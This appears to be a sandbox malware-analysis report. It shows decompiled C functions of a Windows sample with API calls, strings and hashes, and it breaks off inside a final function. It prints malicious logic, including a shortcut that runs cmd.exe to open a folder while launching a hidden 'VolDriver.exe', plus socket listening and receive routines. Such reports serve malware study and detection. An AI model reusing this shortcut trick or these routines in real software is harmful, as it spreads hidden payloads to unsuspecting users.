                                                                                                                                                                                                                                                                  			E0040D5C0(intOrPtr __edi, void* __esi) {
                                                                                                                                                                                                                                                                  				short _v8;
                                                                                                                                                                                                                                                                  				short _v14;
                                                                                                                                                                                                                                                                  				short _v18;
                                                                                                                                                                                                                                                                  				short _v22;
                                                                                                                                                                                                                                                                  				short _v24;
                                                                                                                                                                                                                                                                  				short _v26;
                                                                                                                                                                                                                                                                  				short _v28;
                                                                                                                                                                                                                                                                  				short _v30;
                                                                                                                                                                                                                                                                  				char _v33;
                                                                                                                                                                                                                                                                  				char _v52;
                                                                                                                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                                                                                                                  				void* _t21;
                                                                                                                                                                                                                                                                  				short _t24;
                                                                                                                                                                                                                                                                  				void* _t25;
                                                                                                                                                                                                                                                                  				void* _t30;
                                                                                                                                                                                                                                                                  				void* _t31;
                                                                                                                                                                                                                                                                  				intOrPtr _t38;
                                                                                                                                                                                                                                                                  				void* _t39;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t39 = __esi;
                                                                                                                                                                                                                                                                  				_t38 = __edi;
                                                                                                                                                                                                                                                                  				if(__esi == 0 || __edi == 0) {
                                                                                                                                                                                                                                                                  					return 0;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					_t31 = E00408820(0x24);
                                                                                                                                                                                                                                                                  					 *_t31 = 0x756470;
                                                                                                                                                                                                                                                                  					 *(_t31 + 4) = 0;
                                                                                                                                                                                                                                                                  					_t21 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                  					 *(_t31 + 0x10) = _t21;
                                                                                                                                                                                                                                                                  					__imp__#23(2, 2, 0x11, _t30);
                                                                                                                                                                                                                                                                  					 *(_t31 + 8) = _t21;
                                                                                                                                                                                                                                                                  					if(_t21 == 0xffffffff) {
                                                                                                                                                                                                                                                                  						E0040DA20(_t31, __edi);
                                                                                                                                                                                                                                                                  						_t31 = 0;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					if(_t31 == 0) {
                                                                                                                                                                                                                                                                  						L8:
                                                                                                                                                                                                                                                                  						return _t31;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_v26 = 0;
                                                                                                                                                                                                                                                                  					_v22 = 0;
                                                                                                                                                                                                                                                                  					_v18 = 0;
                                                                                                                                                                                                                                                                  					_v14 = 0;
                                                                                                                                                                                                                                                                  					_t24 = _v8;
                                                                                                                                                                                                                                                                  					_v24 = _t24;
                                                                                                                                                                                                                                                                  					_v28 = 2;
                                                                                                                                                                                                                                                                  					__imp__#9(_t39);
                                                                                                                                                                                                                                                                  					_v30 = _t24;
                                                                                                                                                                                                                                                                  					_v33 = 1;
                                                                                                                                                                                                                                                                  					_t25 =  *(_t31 + 8);
                                                                                                                                                                                                                                                                  					__imp__#21(_t25, 0xffff, 4,  &_v33, 1);
                                                                                                                                                                                                                                                                  					__imp__#2( *(_t31 + 8),  &_v52, 0x10);
                                                                                                                                                                                                                                                                  					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)(_t31 + 0xc)) = _t38;
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)(_t31 + 0x14)) = CreateThread(0, 0, E0040D7F0, _t31, 0, 0);
                                                                                                                                                                                                                                                                  						goto L8;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					E0040DA20(_t31, _t38);
                                                                                                                                                                                                                                                                  					return 0;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}





















                                                                                                                                                                                                                                                                  0x0040d5c0
                                                                                                                                                                                                                                                                  0x0040d5c0
                                                                                                                                                                                                                                                                  0x0040d5c8
                                                                                                                                                                                                                                                                  0x0040d6b4
                                                                                                                                                                                                                                                                  0x0040d5d6
                                                                                                                                                                                                                                                                  0x0040d5e5
                                                                                                                                                                                                                                                                  0x0040d5eb
                                                                                                                                                                                                                                                                  0x0040d5f1
                                                                                                                                                                                                                                                                  0x0040d5f8
                                                                                                                                                                                                                                                                  0x0040d604
                                                                                                                                                                                                                                                                  0x0040d607
                                                                                                                                                                                                                                                                  0x0040d60d
                                                                                                                                                                                                                                                                  0x0040d613
                                                                                                                                                                                                                                                                  0x0040d615
                                                                                                                                                                                                                                                                  0x0040d61a
                                                                                                                                                                                                                                                                  0x0040d61a
                                                                                                                                                                                                                                                                  0x0040d61e
                                                                                                                                                                                                                                                                  0x0040d6ae
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d6b0
                                                                                                                                                                                                                                                                  0x0040d626
                                                                                                                                                                                                                                                                  0x0040d62a
                                                                                                                                                                                                                                                                  0x0040d62e
                                                                                                                                                                                                                                                                  0x0040d632
                                                                                                                                                                                                                                                                  0x0040d637
                                                                                                                                                                                                                                                                  0x0040d641
                                                                                                                                                                                                                                                                  0x0040d645
                                                                                                                                                                                                                                                                  0x0040d64a
                                                                                                                                                                                                                                                                  0x0040d659
                                                                                                                                                                                                                                                                  0x0040d65e
                                                                                                                                                                                                                                                                  0x0040d663
                                                                                                                                                                                                                                                                  0x0040d66c
                                                                                                                                                                                                                                                                  0x0040d67d
                                                                                                                                                                                                                                                                  0x0040d686
                                                                                                                                                                                                                                                                  0x0040d6a2
                                                                                                                                                                                                                                                                  0x0040d6ab
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d6ab
                                                                                                                                                                                                                                                                  0x0040d688
                                                                                                                                                                                                                                                                  0x0040d693
                                                                                                                                                                                                                                                                  0x0040d693

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040D5F8
                                                                                                                                                                                                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 0040D607
                                                                                                                                                                                                                                                                  • htons.WS2_32(00009E34), ref: 0040D64A
                                                                                                                                                                                                                                                                  • setsockopt.WS2_32(?,0000FFFF), ref: 0040D66C
                                                                                                                                                                                                                                                                  • bind.WS2_32(?,00000004,00000010), ref: 0040D67D
                                                                                                                                                                                                                                                                    • Part of subcall function 0040DA20: SetEvent.KERNEL32(?,?,0040DB15,?,?,0040BC3E,00000000), ref: 0040DA31
                                                                                                                                                                                                                                                                    • Part of subcall function 0040DA20: WaitForSingleObject.KERNEL32(?,000000FF,?,0040DB15,?,?,0040BC3E,00000000), ref: 0040DA3D
                                                                                                                                                                                                                                                                    • Part of subcall function 0040DA20: CloseHandle.KERNEL32(?,?,0040DB15,?,?,0040BC3E,00000000), ref: 0040DA47
                                                                                                                                                                                                                                                                  • CreateThread.KERNEL32 ref: 0040D6A5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4174406920-0
                                                                                                                                                                                                                                                                  • Opcode ID: 2292cefa0a317ec5c1901b405943e875dcba3fe40e447fbf9e9da0f4f3942521
                                                                                                                                                                                                                                                                  • Instruction ID: 64ad3dadd26626afd739fbfdc7006baf33379391ae681bcd66c450bb3cd6af6c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2292cefa0a317ec5c1901b405943e875dcba3fe40e447fbf9e9da0f4f3942521
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8821C7B4A44301AFE710DFB48C86B5776A0AF44710F40897DFA48EB2C1D7B9C80C8B6A
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                                                                                                                  			E0040B260(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                                                                                                                  				char _v16;
                                                                                                                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                                                                                                                                  				intOrPtr _t38;
                                                                                                                                                                                                                                                                  				intOrPtr _t43;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v12 = _a16;
                                                                                                                                                                                                                                                                  				if(_a16 != 0xffffffff) {
                                                                                                                                                                                                                                                                  					_v12 = GetTickCount() + _v12;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_v8 = _a8;
                                                                                                                                                                                                                                                                  				while(1) {
                                                                                                                                                                                                                                                                  					_v16 = 0;
                                                                                                                                                                                                                                                                  					_t38 = _a4;
                                                                                                                                                                                                                                                                  					__imp__#10(_t38, 0x4004667f,  &_v16);
                                                                                                                                                                                                                                                                  					if(_t38 == 0xffffffff) {
                                                                                                                                                                                                                                                                  						break;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					if(_v16 > 0) {
                                                                                                                                                                                                                                                                  						if(_v16 >= _a12) {
                                                                                                                                                                                                                                                                  							_v24 = _a12;
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							_v24 = _v16;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t43 = _a4;
                                                                                                                                                                                                                                                                  						__imp__#16(_t43, _v8, _v24, 0);
                                                                                                                                                                                                                                                                  						_v20 = _t43;
                                                                                                                                                                                                                                                                  						if(_v20 > 0) {
                                                                                                                                                                                                                                                                  							if(_a16 != 0xffffffff) {
                                                                                                                                                                                                                                                                  								_v12 = GetTickCount() + _a16;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_a12 = _a12 - _v20;
                                                                                                                                                                                                                                                                  							_v8 = _v8 + _v20;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					Sleep(1);
                                                                                                                                                                                                                                                                  					if(GetTickCount() > _v12 || _a12 == 0) {
                                                                                                                                                                                                                                                                  						L15:
                                                                                                                                                                                                                                                                  						return 0 | _a12 == 0x00000000;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						continue;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				goto L15;
                                                                                                                                                                                                                                                                  			}










                                                                                                                                                                                                                                                                  0x0040b269
                                                                                                                                                                                                                                                                  0x0040b270
                                                                                                                                                                                                                                                                  0x0040b27b
                                                                                                                                                                                                                                                                  0x0040b27b
                                                                                                                                                                                                                                                                  0x0040b281
                                                                                                                                                                                                                                                                  0x0040b284
                                                                                                                                                                                                                                                                  0x0040b284
                                                                                                                                                                                                                                                                  0x0040b294
                                                                                                                                                                                                                                                                  0x0040b298
                                                                                                                                                                                                                                                                  0x0040b2a1
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040b2a9
                                                                                                                                                                                                                                                                  0x0040b2b1
                                                                                                                                                                                                                                                                  0x0040b2be
                                                                                                                                                                                                                                                                  0x0040b2b3
                                                                                                                                                                                                                                                                  0x0040b2b6
                                                                                                                                                                                                                                                                  0x0040b2b6
                                                                                                                                                                                                                                                                  0x0040b2cb
                                                                                                                                                                                                                                                                  0x0040b2cf
                                                                                                                                                                                                                                                                  0x0040b2d5
                                                                                                                                                                                                                                                                  0x0040b2dc
                                                                                                                                                                                                                                                                  0x0040b2e2
                                                                                                                                                                                                                                                                  0x0040b2ed
                                                                                                                                                                                                                                                                  0x0040b2ed
                                                                                                                                                                                                                                                                  0x0040b2f6
                                                                                                                                                                                                                                                                  0x0040b2ff
                                                                                                                                                                                                                                                                  0x0040b2ff
                                                                                                                                                                                                                                                                  0x0040b2dc
                                                                                                                                                                                                                                                                  0x0040b304
                                                                                                                                                                                                                                                                  0x0040b313
                                                                                                                                                                                                                                                                  0x0040b31f
                                                                                                                                                                                                                                                                  0x0040b32b
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040b313
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040B272
                                                                                                                                                                                                                                                                  • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040B298
                                                                                                                                                                                                                                                                  • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040B2CF
                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040B2E4
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000001), ref: 0040B304
                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040B30A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CountTick$Sleepioctlsocketrecv
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 107502007-0
                                                                                                                                                                                                                                                                  • Opcode ID: 71a43e6b7f37b64d634f912b2060f7a57b042f16722d135749a0119acfb0bbc8
                                                                                                                                                                                                                                                                  • Instruction ID: bff57235f866894c86fcfed964af6ad312f668c5fd324e9b8beac796e9e02ddb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71a43e6b7f37b64d634f912b2060f7a57b042f16722d135749a0119acfb0bbc8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34310C74900209DFCB14DFA4D948AAE77B5FF44315F10867AE821A3390C7349A50CB99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 54%
                                                                                                                                                                                                                                                                  			E00404AA0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				void* _v12;
                                                                                                                                                                                                                                                                  				void* _v16;
                                                                                                                                                                                                                                                                  				short _v540;
                                                                                                                                                                                                                                                                  				char* _t37;
                                                                                                                                                                                                                                                                  				intOrPtr _t42;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                  				_t37 =  &_v12;
                                                                                                                                                                                                                                                                  				__imp__CoCreateInstance(0x40f338, 0, 1, 0x40f328, _t37);
                                                                                                                                                                                                                                                                  				_v8 = _t37;
                                                                                                                                                                                                                                                                  				if(_v8 >= 0 && _v12 != 0) {
                                                                                                                                                                                                                                                                  					wsprintfW( &_v540, L"/c start .\\%s & start .\\%s\\VolDriver.exe", 0x412c2c, 0x412c2c);
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x50))))(_v12, L"%windir%\\System32\\cmd.exe");
                                                                                                                                                                                                                                                                  					_t42 =  *_v12;
                                                                                                                                                                                                                                                                  					_t13 = _t42 + 0x44; // 0xffed0c85
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)( *_t13))(_v12, _a8, _a12);
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x3c))))(_v12, 7);
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x2c))))(_v12,  &_v540);
                                                                                                                                                                                                                                                                  					_v8 =  *((intOrPtr*)( *((intOrPtr*)( *_v12))))(_v12, 0x40f348,  &_v16);
                                                                                                                                                                                                                                                                  					if(_v8 >= 0 && _v16 != 0) {
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x18))))(_v16, _a4, 1);
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)( *((intOrPtr*)( *_v16 + 8))))(_v16);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					return  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))(_v12);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t37;
                                                                                                                                                                                                                                                                  			}









                                                                                                                                                                                                                                                                  0x00404aab
                                                                                                                                                                                                                                                                  0x00404ab1
                                                                                                                                                                                                                                                                  0x00404ac3
                                                                                                                                                                                                                                                                  0x00404ac9
                                                                                                                                                                                                                                                                  0x00404ad0
                                                                                                                                                                                                                                                                  0x00404af6
                                                                                                                                                                                                                                                                  0x00404b10
                                                                                                                                                                                                                                                                  0x00404b1d
                                                                                                                                                                                                                                                                  0x00404b23
                                                                                                                                                                                                                                                                  0x00404b26
                                                                                                                                                                                                                                                                  0x00404b36
                                                                                                                                                                                                                                                                  0x00404b4b
                                                                                                                                                                                                                                                                  0x00404b63
                                                                                                                                                                                                                                                                  0x00404b6a
                                                                                                                                                                                                                                                                  0x00404b84
                                                                                                                                                                                                                                                                  0x00404b92
                                                                                                                                                                                                                                                                  0x00404b92
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404ba0
                                                                                                                                                                                                                                                                  0x00404ba5

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00404AAB
                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(0040F338,00000000,00000001,0040F328,?), ref: 00404AC3
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404AF6
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • %windir%\System32\cmd.exe, xrefs: 00404AFF
                                                                                                                                                                                                                                                                  • /c start .\%s & start .\%s\VolDriver.exe, xrefs: 00404AEA
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateInitializeInstancewsprintf
                                                                                                                                                                                                                                                                  • String ID: %windir%\System32\cmd.exe$/c start .\%s & start .\%s\VolDriver.exe
                                                                                                                                                                                                                                                                  • API String ID: 2038452267-2473591295
                                                                                                                                                                                                                                                                  • Opcode ID: e84bca01633c0b67cdaf158f2d842b41c9f03d7c282f571858ef33f9b8c4cd5f
                                                                                                                                                                                                                                                                  • Instruction ID: a0a101224a9dd2f89691b4f744d4c3830e9e87c60b690d54722ae6d8de60f7c0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e84bca01633c0b67cdaf158f2d842b41c9f03d7c282f571858ef33f9b8c4cd5f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A31EC75A40208EFCB04DF98C884FDEB7B5EF8C704F2081A9E605A73A1D674AE85CB54
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 16%
                                                                                                                                                                                                                                                                  			E00409260() {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				short _v10;
                                                                                                                                                                                                                                                                  				short _v14;
                                                                                                                                                                                                                                                                  				short _v18;
                                                                                                                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                                                                                                                  				short _v22;
                                                                                                                                                                                                                                                                  				char _v24;
                                                                                                                                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                                                                                                                                  				short _v30;
                                                                                                                                                                                                                                                                  				short _v34;
                                                                                                                                                                                                                                                                  				short _v38;
                                                                                                                                                                                                                                                                  				intOrPtr _v40;
                                                                                                                                                                                                                                                                  				short _v42;
                                                                                                                                                                                                                                                                  				char _v44;
                                                                                                                                                                                                                                                                  				char _v48;
                                                                                                                                                                                                                                                                  				intOrPtr _t28;
                                                                                                                                                                                                                                                                  				char* _t30;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v8 = 0xffffffff;
                                                                                                                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                                                                                                                  				_v22 = 0;
                                                                                                                                                                                                                                                                  				_v18 = 0;
                                                                                                                                                                                                                                                                  				_v14 = 0;
                                                                                                                                                                                                                                                                  				_v10 = 0;
                                                                                                                                                                                                                                                                  				_v24 = 2;
                                                                                                                                                                                                                                                                  				__imp__#9(0x50);
                                                                                                                                                                                                                                                                  				_v22 = 0;
                                                                                                                                                                                                                                                                  				_t28 = E00409220("www.update.microsoft.com");
                                                                                                                                                                                                                                                                  				_v20 = _t28;
                                                                                                                                                                                                                                                                  				__imp__#23(2, 1, 0);
                                                                                                                                                                                                                                                                  				_v28 = _t28;
                                                                                                                                                                                                                                                                  				if(_v28 != 0xffffffff) {
                                                                                                                                                                                                                                                                  					_t30 =  &_v24;
                                                                                                                                                                                                                                                                  					__imp__#4(_v28, _t30, 0x10);
                                                                                                                                                                                                                                                                  					if(_t30 == 0) {
                                                                                                                                                                                                                                                                  						_v44 = 0;
                                                                                                                                                                                                                                                                  						_v42 = 0;
                                                                                                                                                                                                                                                                  						_v38 = 0;
                                                                                                                                                                                                                                                                  						_v34 = 0;
                                                                                                                                                                                                                                                                  						_v30 = 0;
                                                                                                                                                                                                                                                                  						_v48 = 0x10;
                                                                                                                                                                                                                                                                  						__imp__#6(_v28,  &_v44,  &_v48);
                                                                                                                                                                                                                                                                  						_v8 = _v40;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					E00409320(_v28);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _v8;
                                                                                                                                                                                                                                                                  			}




















                                                                                                                                                                                                                                                                  0x00409266
                                                                                                                                                                                                                                                                  0x0040926f
                                                                                                                                                                                                                                                                  0x00409275
                                                                                                                                                                                                                                                                  0x00409278
                                                                                                                                                                                                                                                                  0x0040927b
                                                                                                                                                                                                                                                                  0x0040927e
                                                                                                                                                                                                                                                                  0x00409287
                                                                                                                                                                                                                                                                  0x0040928d
                                                                                                                                                                                                                                                                  0x00409293
                                                                                                                                                                                                                                                                  0x0040929c
                                                                                                                                                                                                                                                                  0x004092a4
                                                                                                                                                                                                                                                                  0x004092ad
                                                                                                                                                                                                                                                                  0x004092b3
                                                                                                                                                                                                                                                                  0x004092ba
                                                                                                                                                                                                                                                                  0x004092be
                                                                                                                                                                                                                                                                  0x004092c6
                                                                                                                                                                                                                                                                  0x004092ce
                                                                                                                                                                                                                                                                  0x004092d2
                                                                                                                                                                                                                                                                  0x004092d8
                                                                                                                                                                                                                                                                  0x004092db
                                                                                                                                                                                                                                                                  0x004092de
                                                                                                                                                                                                                                                                  0x004092e1
                                                                                                                                                                                                                                                                  0x004092e5
                                                                                                                                                                                                                                                                  0x004092f8
                                                                                                                                                                                                                                                                  0x00409301
                                                                                                                                                                                                                                                                  0x00409301
                                                                                                                                                                                                                                                                  0x00409308
                                                                                                                                                                                                                                                                  0x0040930d
                                                                                                                                                                                                                                                                  0x00409316

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • htons.WS2_32(00000050), ref: 0040928D
                                                                                                                                                                                                                                                                    • Part of subcall function 00409220: inet_addr.WS2_32(004092A1), ref: 0040922A
                                                                                                                                                                                                                                                                    • Part of subcall function 00409220: gethostbyname.WS2_32(?), ref: 0040923D
                                                                                                                                                                                                                                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 004092AD
                                                                                                                                                                                                                                                                  • connect.WS2_32(000000FF,?,00000010), ref: 004092C6
                                                                                                                                                                                                                                                                  • getsockname.WS2_32(000000FF,?,00000010), ref: 004092F8
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • www.update.microsoft.com, xrefs: 00409297
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                                                                                                                                                                                                  • String ID: www.update.microsoft.com
                                                                                                                                                                                                                                                                  • API String ID: 4063137541-1705189816
                                                                                                                                                                                                                                                                  • Opcode ID: 66988d6a19ef39c640c2957d28e5451b2ffdae004b209fc3fd48061069894e7e
                                                                                                                                                                                                                                                                  • Instruction ID: a9263f03ec831ac8994e89c93e2ed8b017647d94978a45a17146db47804ae5bd
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66988d6a19ef39c640c2957d28e5451b2ffdae004b209fc3fd48061069894e7e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D2129B4E10309ABCB04DFE8D946AEEBBB5AF4C300F10457EE504F3290E2715A44CBA9
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E0040EC4D(long _a4) {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                                                                                                                  				signed int _v16;
                                                                                                                                                                                                                                                                  				short* _v32;
                                                                                                                                                                                                                                                                  				void _v36;
                                                                                                                                                                                                                                                                  				void* _t57;
                                                                                                                                                                                                                                                                  				signed int _t58;
                                                                                                                                                                                                                                                                  				signed int _t61;
                                                                                                                                                                                                                                                                  				signed int _t62;
                                                                                                                                                                                                                                                                  				void* _t63;
                                                                                                                                                                                                                                                                  				signed int* _t68;
                                                                                                                                                                                                                                                                  				intOrPtr* _t69;
                                                                                                                                                                                                                                                                  				intOrPtr* _t71;
                                                                                                                                                                                                                                                                  				intOrPtr _t72;
                                                                                                                                                                                                                                                                  				intOrPtr _t75;
                                                                                                                                                                                                                                                                  				void* _t76;
                                                                                                                                                                                                                                                                  				signed int _t77;
                                                                                                                                                                                                                                                                  				void* _t78;
                                                                                                                                                                                                                                                                  				void _t80;
                                                                                                                                                                                                                                                                  				signed int _t81;
                                                                                                                                                                                                                                                                  				signed int _t84;
                                                                                                                                                                                                                                                                  				signed int _t86;
                                                                                                                                                                                                                                                                  				short* _t87;
                                                                                                                                                                                                                                                                  				void* _t89;
                                                                                                                                                                                                                                                                  				signed int* _t90;
                                                                                                                                                                                                                                                                  				long _t91;
                                                                                                                                                                                                                                                                  				signed int _t93;
                                                                                                                                                                                                                                                                  				signed int _t94;
                                                                                                                                                                                                                                                                  				signed int _t100;
                                                                                                                                                                                                                                                                  				signed int _t102;
                                                                                                                                                                                                                                                                  				void* _t104;
                                                                                                                                                                                                                                                                  				long _t108;
